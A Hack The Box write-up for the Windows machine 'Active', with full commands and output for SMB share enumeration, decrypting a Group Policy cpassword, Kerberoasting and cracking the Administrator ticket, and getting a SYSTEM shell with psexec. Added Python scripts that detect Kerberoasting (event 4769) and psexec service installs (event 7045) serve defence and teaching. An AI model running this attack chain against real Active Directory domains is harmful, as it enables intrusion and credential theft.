Active

Machine Name: Active (HTB)
Difficulty: Easy
OS: Windows

Walkthrough

Let's start with an Nmap scan.

Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-27 08:05 EDT
Nmap scan report for 10.10.10.100
Host is up (0.16s latency).
Not shown: 65512 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-27 12:30:55Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49169/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPC
49182/tcp open  msrpc         Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=7/27%OT=53%CT=1%CU=31977%PV=Y%DS=2%DC=T%G=Y%TM=60FFF9C
OS:F%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=109%TI=I%CI=I%II=I%SS=S%TS=
OS:7)SEQ(SP=105%GCD=1%ISR=109%TI=I%CI=I%II=I%TS=7)OPS(O1=M54BNW8ST11%O2=M54
OS:BNW8ST11%O3=M54BNW8NNT11%O4=M54BNW8ST11%O5=M54BNW8ST11%O6=M54BST11)WIN(W
OS:1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%
OS:O=M54BNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%
OS:T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD
OS:=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S
OS:=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R
OS:=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%
OS:RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 13m01s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-07-27T12:32:20
|_  start_date: 2021-07-27T05:05:54

TRACEROUTE (using port 111/tcp)
HOP RTT       ADDRESS
1   189.49 ms 10.10.16.1
2   73.41 ms  10.10.10.100

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 811.04 seconds

It is clearly a domain controller, and our domain name is active.htb.
Let's start enumerating over SMB right away. I share the notable parts of the enum4linux output below.

 ========================================= 
|    Share Enumeration on 10.10.10.100    |
 ========================================= 
[V] Attempting to get share list using authentication
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share 
    Replication     Disk      
    SYSVOL          Disk      Logon server share 
    Users           Disk      
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.10.100
[V] Attempting map to share //10.10.10.100/ADMIN$ with command: smbclient -W '' //'10.10.10.100'/'ADMIN$' -U''%'' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/ADMIN$   Mapping: DENIED, Listing: N/A
[V] Attempting map to share //10.10.10.100/C$ with command: smbclient -W '' //'10.10.10.100'/'C$' -U''%'' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/C$   Mapping: DENIED, Listing: N/A
[V] Attempting map to share //10.10.10.100/IPC$ with command: smbclient -W '' //'10.10.10.100'/'IPC$' -U''%'' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/IPC$ Mapping: OK Listing: DENIED
[V] Attempting map to share //10.10.10.100/NETLOGON with command: smbclient -W '' //'10.10.10.100'/'NETLOGON' -U''%'' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/NETLOGON Mapping: DENIED, Listing: N/A
[V] Attempting map to share //10.10.10.100/Replication with command: smbclient -W '' //'10.10.10.100'/'Replication' -U''%'' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/Replication  Mapping: OK, Listing: OK
[V] Attempting map to share //10.10.10.100/SYSVOL with command: smbclient -W '' //'10.10.10.100'/'SYSVOL' -U''%'' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/SYSVOL   Mapping: DENIED, Listing: N/A
[V] Attempting map to share //10.10.10.100/Users with command: smbclient -W '' //'10.10.10.100'/'Users' -U''%'' -c dir 2>&1
//10.10.10.100/Users    Mapping: DENIED, Listing: N/A

Checking with smbmap as well, we get the same results.

┌──(root💀kali)-[~/oscp/htb/Active]
└─# smbmap -u "" -p "" -H 10.10.10.100
[+] IP: 10.10.10.100:445    Name: unknown                                           
        Disk                                                    Permissions Comment
    ----                                                    ----------- -------
    ADMIN$                                              NO ACCESS   Remote Admin
    C$                                                  NO ACCESS   Default share
    IPC$                                                NO ACCESS   Remote IPC
    NETLOGON                                            NO ACCESS   Logon server share 
    Replication                                         READ ONLY   
    SYSVOL                                              NO ACCESS   Logon server share 
    Users                                               NO ACCESS   

Now let's connect with smbclient and see what is in there. Inside there were Group Policy objects, and I started wondering whether I could obtain a user password from them. The article at https://adsecurity.org/?p=2288 explains this topic. After some digging I found user data.

smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> cd Groups\
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> ls
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  Groups.xml                          A      533  Wed Jul 18 16:46:06 2018

        10459647 blocks of size 4096. 5727923 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml 
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (0.6 KiloBytes/sec) (average 0.9 KiloBytes/sec)

Reading this file, the SVC_TGS user's password was sitting there waiting to be decrypted.


┌──(root💀kali)-[~/oscp/htb/Active]
└─# cat Groups.xml 
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

I downloaded the ps1 script used in the link I gave above, opened PowerShell on Kali, and decrypted the password. (https://raw.githubusercontent.com/obscuresec/PowerShell/master/Get-DecryptedCpassword)

┌──(root💀kali)-[~/oscp/htb/Active]
└─# pwsh
PowerShell 7.1.3
Copyright (c) Microsoft Corporation.

https://aka.ms/powershell
Type 'help' to get help.

PS /root/oscp/htb/Active> ls
'a a'   enum4linuxResult   Get-DecryptedCpassword.ps1   GPE.INI   GPT.INI   GptTmpl.inf   Groups.xml
PS /root/oscp/htb/Active> Import-Module ./Get-DecryptedCpassword.ps1
PS /root/oscp/htb/Active> Get-DecryptedCpassword "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18
PS /root/oscp/htb/Active> exit

Now we have a user. I still couldn't get in, so I ran SMB enumeration again in case this user could read the shares I hadn't been able to read before.

 ========================================= 
|    Share Enumeration on 10.10.10.100    |
 ========================================= 
[V] Attempting to get share list using authentication
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share 
    Replication     Disk      
    SYSVOL          Disk      Logon server share 
    Users           Disk      
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.10.100
[V] Attempting map to share //10.10.10.100/ADMIN$ with command: smbclient -W '' //'10.10.10.100'/'ADMIN$' -U'SVC_TGS'%'GPPstillStandingStrong2k18' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/ADMIN$   Mapping: DENIED, Listing: N/A
[V] Attempting map to share //10.10.10.100/C$ with command: smbclient -W '' //'10.10.10.100'/'C$' -U'SVC_TGS'%'GPPstillStandingStrong2k18' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/C$   Mapping: DENIED, Listing: N/A
[V] Attempting map to share //10.10.10.100/IPC$ with command: smbclient -W '' //'10.10.10.100'/'IPC$' -U'SVC_TGS'%'GPPstillStandingStrong2k18' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/IPC$ [E] Can't understand response:
NT_STATUS_INVALID_PARAMETER listing \*
[V] Attempting map to share //10.10.10.100/NETLOGON with command: smbclient -W '' //'10.10.10.100'/'NETLOGON' -U'SVC_TGS'%'GPPstillStandingStrong2k18' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/NETLOGON Mapping: OK, Listing: OK
[V] Attempting map to share //10.10.10.100/Replication with command: smbclient -W '' //'10.10.10.100'/'Replication' -U'SVC_TGS'%'GPPstillStandingStrong2k18' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/Replication  Mapping: OK, Listing: OK
[V] Attempting map to share //10.10.10.100/SYSVOL with command: smbclient -W '' //'10.10.10.100'/'SYSVOL' -U'SVC_TGS'%'GPPstillStandingStrong2k18' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/SYSVOL   Mapping: OK, Listing: OK
[V] Attempting map to share //10.10.10.100/Users with command: smbclient -W '' //'10.10.10.100'/'Users' -U'SVC_TGS'%'GPPstillStandingStrong2k18' -c dir 2>&1
//10.10.10.100/Users    Mapping: OK, Listing: OK

With the user we now have, we hold more rights.


┌──(root💀kali)-[~/oscp/htb/Active]
└─# smbmap -u "SVC_TGS" -p "GPPstillStandingStrong2k18" -H 10.10.10.100
[+] IP: 10.10.10.100:445    Name: 10.10.10.100                                      
        Disk                                                    Permissions Comment
    ----                                                    ----------- -------
    ADMIN$                                              NO ACCESS   Remote Admin
    C$                                                  NO ACCESS   Default share
    IPC$                                                NO ACCESS   Remote IPC
    NETLOGON                                            READ ONLY   Logon server share 
    Replication                                         READ ONLY   
    SYSVOL                                              READ ONLY   Logon server share 
    Users                                               READ ONLY

That is how I got the first flag.

┌──(root💀kali)-[~/oscp/htb/Active]
└─# smbclient -W '' //'10.10.10.100'/'Users' -U'SVC_TGS'%'GPPstillStandingStrong2k18' 2>&1
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sat Jul 21 10:39:20 2018
  ..                                 DR        0  Sat Jul 21 10:39:20 2018
  Administrator                       D        0  Mon Jul 16 06:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 01:06:44 2009
  Default                           DHR        0  Tue Jul 14 02:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 01:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:57:55 2009
  Public                             DR        0  Tue Jul 14 00:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 11:16:32 2018

        10459647 blocks of size 4096. 5727623 blocks available
smb: \> cd SVC_TGS\
smb: \SVC_TGS\> ls
  .                                   D        0  Sat Jul 21 11:16:32 2018
  ..                                  D        0  Sat Jul 21 11:16:32 2018
  Contacts                            D        0  Sat Jul 21 11:14:11 2018
  Desktop                             D        0  Sat Jul 21 11:14:42 2018
  Downloads                           D        0  Sat Jul 21 11:14:23 2018
  Favorites                           D        0  Sat Jul 21 11:14:44 2018
  Links                               D        0  Sat Jul 21 11:14:57 2018
  My Documents                        D        0  Sat Jul 21 11:15:03 2018
  My Music                            D        0  Sat Jul 21 11:15:32 2018
  My Pictures                         D        0  Sat Jul 21 11:15:43 2018
  My Videos                           D        0  Sat Jul 21 11:15:53 2018
  Saved Games                         D        0  Sat Jul 21 11:16:12 2018
  Searches                            D        0  Sat Jul 21 11:16:24 2018
        10459647 blocks of size 4096. 5727623 blocks available
smb: \SVC_TGS\> cd Desktop\
smb: \SVC_TGS\Desktop\> ls
  .                                   D        0  Sat Jul 21 11:14:42 2018
  ..                                  D        0  Sat Jul 21 11:14:42 2018
  user.txt                            A       34  Sat Jul 21 11:06:25 2018

        10459647 blocks of size 4096. 5727623 blocks available
smb: \SVC_TGS\Desktop\> get user.txt

┌──(root💀kali)-[~/oscp/htb/Active]
└─# cat user.txt 
86d67d8ba232bb6a254aa4d10159e983

At this point I was stuck, so I ran BloodHound. Time to gather information with LDAP queries.


┌──(root💀kali)-[~/oscp/htb/Active/bloodhound]
└─# bloodhound-python -u SVC_TGS -p GPPstillStandingStrong2k18 -d active.htb -ns 10.10.10.100 -c all
INFO: Found AD domain: active.htb
INFO: Connecting to LDAP server: dc.active.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.active.htb
INFO: Found 4 users
INFO: Found 40 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.active.htb

While going through BloodHound I discovered that the Administrator user has an SPN set. So I immediately requested the ticket hash. But I got an error.

┌──(root💀kali)-[~/oscp/htb/Active]
└─# python3 /root/tool/AD/impacket/examples/GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2021-01-21 11:07:03.723783             

[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

When you get this error, you need to synchronize your clock with the DC. (https://book.hacktricks.xyz/windows/active-directory-methodology/kerberoast)


┌──(root💀kali)-[~/oscp/htb/Active]
└─# ntpdate 10.10.10.100
27 Jul 09:51:18 ntpdate[2257]: step time server 10.10.10.100 offset +781.865165 sec

Let's try again.


┌──(root💀kali)-[~/oscp/htb/Active]
└─# cat /etc/resolv.conf
nameserver 10.10.10.100

┌──(root💀kali)-[~/oscp/htb/Active]
└─# python3 /root/tool/AD/impacket/examples/GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2021-01-21 11:07:03.723783             

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$27a9be7702cf025d854f726fe25fdffd$...

Great, now let's crack it.


┌──(root💀kali)-[~/oscp/htb/Active]
└─# john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:04 DONE (2021-07-27 09:52) 0.2132g/s 2246Kp/s 2246Kc/s 2246KC/s Tiffani1432..Thrash1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
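Two things in the output above are useful on the defending side: the `$krb5tgs$23$` prefix (John confirms it: etype 23, RC4-HMAC), and the fact that every such request is logged on the DC as Security event 4769 with `TicketEncryptionType` 0x17. The script below is an added example for this walkthrough, not code from the original post, from Impacket or from John: it parses the ticket header format shown above and runs a simple Kerberoast detection over 4769 records. The records are constructed in the shape of 4769's fields; the client IP addresses, the timestamps and the `svc_backup` account are made up (this box has only the Administrator SPN).

```python
"""Kerberoast indicators: the ticket format John loaded above, and the
Security log events (4769) the request leaves behind on the DC.

Added example for this walkthrough; not code from the original post, from
Impacket or from John. Standard library only. SAMPLE_4769 is constructed
in the shape of 4769's fields; the client IPs, the times and the
svc_backup account are made up.
"""
import re
from collections import defaultdict

# Header of the krb5tgs line GetUserSPNs printed above:
#   $krb5tgs$<etype>$*<account>$<realm>$<spn>*$<checksum>$<edata>
KRB5TGS_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>\d+)\$\*(?P<account>[^$]+)\$(?P<realm>[^$]+)"
    r"\$(?P<spn>[^*]+)\*\$")

ETYPE_NAMES = {17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96",
               23: "rc4-hmac"}


def parse_krb5tgs(line):
    """Return etype, account, realm and SPN from a krb5tgs hash line, else None."""
    m = KRB5TGS_RE.match(line.strip())
    if not m:
        return None
    etype = int(m.group("etype"))
    return {"etype": etype, "etype_name": ETYPE_NAMES.get(etype, "unknown"),
            "account": m.group("account"), "realm": m.group("realm"),
            "spn": m.group("spn")}


def is_user_account(service_name):
    """Computer accounts end in '$'; krbtgt is the KDC's own principal."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def detect_kerberoast(events, rc4_etypes=("0x17",)):
    """Flag successful TGS requests that used RC4 for a user-account SPN.
    Returns the alerts plus, per (requester, client IP), the distinct
    service accounts touched: one burst asking for every SPN in the domain
    is the classic shape of a bulk roast."""
    alerts, touched = [], defaultdict(set)
    for ev in events:
        if ev.get("Status") != "0x0":           # failed request, no ticket issued
            continue
        if ev.get("TicketEncryptionType") not in rc4_etypes:
            continue
        if not is_user_account(ev.get("ServiceName", "")):
            continue
        key = (ev["TargetUserName"], ev["IpAddress"])
        touched[key].add(ev["ServiceName"])
        alerts.append({"time": ev["time"], "requester": ev["TargetUserName"],
                       "ip": ev["IpAddress"], "service": ev["ServiceName"]})
    summary = {k: sorted(v) for k, v in touched.items()}
    return alerts, summary


# Constructed 4769 records (one dict per event), roughly what the requests
# in this walkthrough would leave behind on the DC.
SAMPLE_4769 = [
    # AES ticket for a computer account: ordinary traffic.
    {"time": "2021-07-27T12:51:30Z", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "DC$", "TicketEncryptionType": "0x12",
     "IpAddress": "::ffff:10.10.16.5", "Status": "0x0"},
    # First attempt, rejected for clock skew (0x25 = KRB_AP_ERR_SKEW).
    {"time": "2021-07-27T12:51:31Z", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "Administrator", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:10.10.16.5", "Status": "0x25"},
    # Retry after ntpdate: an RC4 ticket for a user-account SPN was issued.
    {"time": "2021-07-27T13:52:02Z", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "Administrator", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:10.10.16.5", "Status": "0x0"},
    # Same burst, a second (constructed) service account.
    {"time": "2021-07-27T13:52:02Z", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:10.10.16.5", "Status": "0x0"},
    # Requests to krbtgt (renewals, referrals) are excluded.
    {"time": "2021-07-27T13:52:03Z", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:10.10.16.5", "Status": "0x0"},
]

if __name__ == "__main__":
    print(parse_krb5tgs("$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/"
                        "Administrator*$27a9be7702cf025d854f726fe25fdffd$..."))
    alerts, summary = detect_kerberoast(SAMPLE_4769)
    for a in alerts:
        print(f"[!] {a['time']} {a['requester']} from {a['ip']} "
              f"got an RC4 ticket for {a['service']}")
    for (who, ip), services in summary.items():
        print(f"    {who} @ {ip}: {len(services)} account(s): {', '.join(services)}")
```

The filter on etype is what makes this cheap to run: if the service accounts carrying SPNs are set to AES-only (the `msDS-SupportedEncryptionTypes` attribute, and a long random password so even an AES ticket is not crackable), then legitimate clients never obtain an RC4 ticket for them and any 0x17 against a user account is itself the alert. The clock-skew record is kept in the sample deliberately: a failed request is not a ticket the requester can take offline, so it is excluded here, but a burst of failures right before a success is exactly the `ntpdate` step of this walkthrough and is worth a lower-severity rule of its own.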

┌──(root💀kali)-[~/tool/AD/impacket/examples]
└─# python3 psexec.py Administrator:Ticketmaster1968@10.10.10.100
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file ONeZjpOH.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service iDPJ on 10.10.10.100.....
[*] Starting service iDPJ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>cd C:\Users\Administrator\Desktop\

C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 2AF3-72E4

 Directory of C:\Users\Administrator\Desktop

21/01/2021  07:49 úú    <DIR>          .
21/01/2021  07:49 úú    <DIR>          ..
21/07/2018  06:06 úú                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)  23.460.220.928 bytes free

C:\Users\Administrator\Desktop>type root.txt
b5fc76d1d6b91d77b2fbf2d54d0f708b

C:\Users\Administrator\Desktop>
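The psexec session above is noisy from the DC's point of view: a binary with a random name (`ONeZjpOH.exe`) is written to ADMIN$, i.e. the Windows directory, and a service with a random name (`iDPJ`) is created to run it, which the System log records as event 7045. The script below is an added example for this walkthrough, not code from the original post or from Impacket: it scores 7045 records against that pattern. The records are constructed in the shape of 7045's fields (`ServiceName`, `ImagePath`, `ServiceType`, `StartType`, `AccountName`) plus a `host` field a collector would add; that the service image is the uploaded binary sitting directly under the Windows root is an assumption drawn from the ADMIN$ upload shown above.

```python
"""Flag service installs (System log event 7045) that match the remote
execution pattern in the psexec session above: a service whose image was
dropped straight into the Windows directory, i.e. the ADMIN$ share.

Added example for this walkthrough; not code from the original post or from
Impacket. Standard library only. SAMPLE_7045 is constructed in the shape of
7045's fields; "host" is a collector-added field, also constructed.
"""
import re

# Image is a bare file name in the Windows root (what an ADMIN$ upload
# followed by a service pointing at it looks like), not in a subdirectory.
SYSROOT_IMAGE_RE = re.compile(
    r'^"?(?:%systemroot%|c:\\windows)\\[a-z0-9]{4,12}\.exe"?$', re.I)

# Supporting signal only: letters, 4-8 long, mixed case ("iDPJ" above).
# Too noisy on its own; WdNisSvc below shows why.
RANDOM_NAME_RE = re.compile(r"^(?=.*[a-z])(?=.*[A-Z])[A-Za-z]{4,8}$")


def score_service_install(ev):
    """Return the indicators a 7045 record matches (empty list if none)."""
    hits = []
    if SYSROOT_IMAGE_RE.match(ev.get("ImagePath", "")):
        hits.append("image in Windows root")
    if RANDOM_NAME_RE.match(ev.get("ServiceName", "")):
        hits.append("random-looking service name")
    if ev.get("AccountName") == "LocalSystem":
        hits.append("runs as LocalSystem")
    return hits


def detect_remote_exec_services(events, allow_names=frozenset()):
    """Flag records whose image sits in the Windows root, unless the service
    name is on the allow list (an admin tool you knowingly use)."""
    flagged = []
    for ev in events:
        if ev.get("ServiceName") in allow_names:
            continue
        hits = score_service_install(ev)
        if "image in Windows root" in hits:
            flagged.append({"host": ev["host"], "service": ev["ServiceName"],
                            "image": ev["ImagePath"], "indicators": hits})
    return flagged


SAMPLE_7045 = [
    # Mirrors the names in the psexec output above.
    {"host": "DC", "ServiceName": "iDPJ", "ImagePath": r"%systemroot%\ONeZjpOH.exe",
     "ServiceType": "user mode service", "StartType": "demand start",
     "AccountName": "LocalSystem"},
    # Sysinternals PsExec drops its service binary in the same place.
    {"host": "DC", "ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe",
     "ServiceType": "user mode service", "StartType": "demand start",
     "AccountName": "LocalSystem"},
    # Ordinary service: mixed-case name but a proper install directory.
    {"host": "DC", "ServiceName": "WdNisSvc",
     "ImagePath": r'"C:\Program Files\Windows Defender\NisSrv.exe"',
     "ServiceType": "user mode service", "StartType": "demand start",
     "AccountName": r"NT AUTHORITY\LocalService"},
]

if __name__ == "__main__":
    for f in detect_remote_exec_services(SAMPLE_7045):
        print(f"[!] {f['host']}: service {f['service']} -> {f['image']} "
              f"({', '.join(f['indicators'])})")
```

The image-path rule is the one that carries the detection; the name and account rules only add confidence, which is why `WdNisSvc` (mixed-case name, legitimate directory) is scored but not flagged. Sysinternals PsExec is flagged on purpose: it leaves the same artifact, so a team that uses it needs an allow list, and anything else landing in that list is worth a look. On a domain controller a new 7045 of this shape should be rare enough to page on, and on this box the same session would also be visible as the SMB write to ADMIN$ and the service start under `nt authority\system`.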
Categories: Active Directory, PowerShell, Walkthrough
